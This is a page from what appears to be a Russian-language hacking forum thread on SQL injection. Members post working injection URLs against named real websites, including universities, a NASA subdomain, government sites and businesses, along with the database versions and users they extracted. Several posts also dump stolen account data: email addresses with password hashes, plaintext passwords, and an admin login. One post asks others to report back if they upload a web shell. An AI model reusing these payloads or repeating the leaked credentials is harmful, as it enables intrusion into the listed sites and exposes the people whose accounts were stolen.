SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://www.bekkin.ru

    юзер:
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),1,1)))=109 m
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),2,1)))=121 y
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),3,1)))=115 s
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),4,1)))=113 q
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),5,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),6,1)))=98 b
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),7,1)))=101 e
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),8,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),9,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),10,1)))=105 i
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),11,1)))=110 n
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),12,1)))=64 @
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),13,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),14,1)))=111 o
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),15,1)))=99 c
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),16,1)))=97 a
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),17,1)))=108 l
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),18,1)))=104 h
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),19,1)))=111 o
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),20,1)))=115 s
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),21,1)))=116 t
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),22,1)))=0

    бд:
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),1,1)))=98 b
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),2,1)))=101 e
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),3,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),4,1)))=107 k
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),5,1)))=105 i
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),6,1)))=110 n
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(database(),7,1)))=0

    Версия MySQL:
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),1,1)=3 3
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),2,1)))=46 .
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),3,1)=2 2
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),4,1)=3 3
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),5,1)))=46 .
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),6,1)=5 5
    http://www.bekkin.ru/index.php?rub=11+and+substring(version(),7,1)=8 8
    http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version(),8,1)))=0
     
  2. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://unixdows.com/cms/php.php?id=-1%20union%20select%20version(),%20concat_ws(0x3a,user_id,user_password%20)%20from%20tbl_auth_user--
    Code:
    http://www.ihf-hr.org/cms/cms.php?sec_id=1&pag_id=-4%20union%20select%20version()--
     
    #7602 Assembler, 5 Feb 2009
    Last edited by a moderator: 5 Feb 2009
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    IP Call

    http://www.smartcall.ro/document.php?doc=-7+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),4,5,6,7,8,9--

    Database Version: 5.0.18
    Database name: smartcall
    User name: smartcall@localhost


    [0]:1:dima:dima@smartcall.ro:ebb934cccce0cbe48e5b017398807a46
    [1]:2:Saficus:catalin.sarafoleanu@smartcall.ro:5d0f13929ca7be7812e00cf0353bac1d
    [2]:3:alx:alexandru.albu@smartcall.ro:8ae4f4568bcc10b12d8ececaf24ade76


    [0]:43:j:20050082:40250776460:k:k
    [1]:44:d:20050082:40250776460:k:k
    [2]:45:l:20050082:40250776460:s:s
    [3]:46:l:20050082:40250776460:k:k
    [4]:47:albu alexandru:3333:40212601289:alexandru.albu@smartcall.ro:nuamparola
    [5]:48:print Pack Prod:90:40214608399:liviu.micu@smartcall.ro:print
     
  4. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://www.bkreml.ru

    юзер:
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),1,1)))='109 m
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),2,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),3,1)))='120 x
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),4,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),5,1)))='98 b
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),6,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),7,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),8,1)))='95 _
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),9,1)))='107 k
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),10,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),11,1)))='122 z
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),12,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),13,1)))='110 n
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),14,1)))='64 @
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),15,1)))='108 l
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),16,1)))='111 o
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),17,1)))='99 c
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),18,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),19,1)))='108 l
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),20,1)))='104 h
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),21,1)))='111 o
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),22,1)))='115 s
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),23,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),24,1)))='0

    бд:
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),1,1)))='109 m
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),2,1)))='96 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),3,1)))='120 x
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),4,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),5,1)))='98 b
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),6,1)))='105 i
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),7,1)))='116 t
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),8,1)))='95 _
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),9,1)))='107 k
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),10,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),11,1)))='122 z
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),12,1)))='97 a
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),13,1)))='110 n
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),14,1)))='0

    версия MySQL:
    http://www.bkreml.ru/?page=5'+and+substring(version(),1,1)='3 3
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),2,1)))='46 .
    http://www.bkreml.ru/?page=5'+and+substring(version(),3,1)='2 2
    http://www.bkreml.ru/?page=5'+and+substring(version(),4,1)='3 3
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),5,1)))='46 .
    http://www.bkreml.ru/?page=5'+and+substring(version(),6,1)='4 4
    http://www.bkreml.ru/?page=5'+and+substring(version(),7,1)='4 4
    http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),8,1)))='0
     
  5. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    www.condi.ru PageRank: 4 тИЦ: 450
    Code:
    http://www.condi.ru/news.php?news_id=-7+union+select+1,2,unhex(hex(concat_ws(user(),version(),database()))),4,5
    
    alink@localhost:4.1.18-log:condi

    www.zsk.ru PageRank: 5 тИЦ: 350
    Code:
    http://www.zsk.ru/news.php?newsid=32+union+select+1,2,3,4,concat_ws(0x3A,version(),user(),database()),6,7,8,9,10,11,12,13--
    
    З.Ы. кандидаты в антибоян.
     
    #7605 AkyHa_MaTaTa, 5 Feb 2009
    Last edited: 5 Feb 2009
  6. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Ещё одна крупная компания -) Берём рута

    Database Version: 5.0.45-community-nt
    Database name: vero_english
    User name: root@localhost

    Берём юзеров с мускула! Он один. Ах как обидно -)

    : root : *4F94E0B0F39112E823AFC0BFA211C72E2897226F

     
    2 people like this.
  7. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    PR4

    +
    http://www.speedreading.com/ - PR3
    http://www.rocketreader.com/ - PR5

    Database Version: 5.0.45-community
    Database name: ebook_genre
    User name: root@localhost

    admin:b8ad16f54966251f85263ca612dbb705
    maya:c8772558781f513ea51a2312e8d1346a

    portaladmin@rocketreader.com:jim234be

    от форума freeonlinebooks:
    speed:$H$9.Z3lXp2zBIoIY5hyIFoFtnzNBCyAa/ (в другой базе нашел пасс seagull692)

    форум speedreading:

    root:*5D81277EE8B4D2F2C50DA72812A9C12AF9A2DF3E

    Еще хз откуда пароли, пока писал, уже забыл, но думаю вам не составит труда найти:

    admin:testrocket
    amjith:amjith
     
    #7607 BloodyMessage, 5 Feb 2009
    Last edited: 8 Feb 2009
    1 person likes this.
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://www.songlines.co.uk/topoftheworld/top-of-the-world.php?id=-37+union+select+1,2,version(),4,5,6,7,8/*
    4.1.22

    [​IMG]
     
    _________________________
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    edu.ro

    http://www.geo.edu.ro/sgr/article.php?sid=-125+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--


    Database Version: 4.0.18
    Database name: sgr
    User name: root@localhost



    Found mysql.users with columns user, password

    Found users with columns email,name,uname,uid,pass
     
  10. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    460
    Likes Received:
    161
    Reputations:
    3
    пр6
    http://www.realityofaid.org/news.php?id=-1+union+select+1,2,3,4,5,6--

    5 ветка

    есл зальете шелл напишите в личку=)
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://travel.colacotwayweb.com.au/world.php?cat=-1003+union+select+1,2,table_name+from+information_schema.tables+limit+1,1--
    ничего интересного..

    5.0.67-community
     
    _________________________
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://www.sierra-tech.com/word.php?id=-6+union+select+1,2,3,4,5,version()/*
    4.1.12

    Code:
    http://www.asic-cafe.org/htm/CSA/word.php?id=-10+union+select+1,2,version(),4,5,6/*
    советую глянуть эту скулю)) ;)

    4.1.21
     
    _________________________
    1 person likes this.
  13. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Pr 6 Nas a.gov
    http://ares.jsc.na sa.gov/_Includes/People.cfm?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dbo_tblKABranches

    Докручивайте сами =)
     
  14. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    High Quality Asian Market



    Database Version: 5.0.24-standard
    Database name: lottepla
    User name: lottepla@67.59.151.227


    Берём дядю админа


    Fields email : username : password : active

    : arsman@arsman.com : LotteOFFLIMITS : adminOFFLIMITS : 1



    Много софта


    Database Version: 5.0.45-log
    Database name: gears_box
    User name: vovka@cgi1303.int.bizland.net


    Много пользователей -) пассы в чистом виде.

    Fields e_mail:pASSWORD

    : info@UnusualWorks.com : yqMbtyxQ
    : admin@cyber-webcom.com : rC7Zy6L9
    : meanfox@meanfox.com : KtQNPnK6
    : dstep@mail.uln.ru : WHZL3MjZ
    : contact@audio-converter.com : ExAzwyPm
     
    #7614 spherics, 6 Feb 2009
    Last edited: 6 Feb 2009
    3 people like this.
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://sportsbuilders.org/page.php?id=-125'+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17/*
    4.1.22-standard-log
    PR: 4

    Code:
    http://mojetesty.pl/content/slownik/word.php?id=-3924+union+select+1,version(),3,4,5,6,7,8--
    5.0.51-2+tld2-log

    PR: 3
     
    _________________________
    1 person likes this.
  16. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    Выложил: на antichat http://www.kbs-spritztechnik.com/cms.php?pageId=-2%20union%20select%20group_concat(table_name)%20from%20information_schema.tables--
    jokester: у меня такое ощущение, что всем пофигу на правила, я в предыдущем твоём посте удалил bluebit.com.au с комментарием "БОЯН", и ты постишь его в этом. Это такая новая игра, а вдруг модератор не увидет?
     
    #7616 Assembler, 6 Feb 2009
    Last edited by a moderator: 6 Feb 2009
  17. edichka

    edichka Member

    Joined:
    31 Jan 2009
    Messages:
    19
    Likes Received:
    14
    Reputations:
    0
    Code:
    http://depts.washington.edu/mcb/facultyinfo.php?id=-18+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--
    Database Version: 5.0.27-standard
    Database name: facultyinfo
    User name: lowpriv@depts01.u.washington.edu

    User:password
    root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
    root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
    lowpriv:451751d513d92913
    lowpriv:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
    root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
     
    2 people like this.
  18. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    FEDERAL GOVERNMENT OF NIGERIA

    Database Version: 5.0.45
    Database name: CONTENTS
    User name: contents@localhost


    5.0.24a-Debian_9-log
    vesmirweb@localhost
    vesmirweb
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://www.randersen.dk/privat/test/asd.php?todo=edit&id=-2+union+select+version(),2/*
    5.0.32-Debian_7etch8-log

    ппц там медленно все..
    Code:
    http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+version(),2,3,4,5,6,7,8,9/*
    4.1.20-log

    PR: 6
     
    _________________________
    #7619 yarbabin, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*


    Version: 5.0.22-Debian_0ubuntu6.06.10-log
    Database : isj
    User : isj@localhost
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.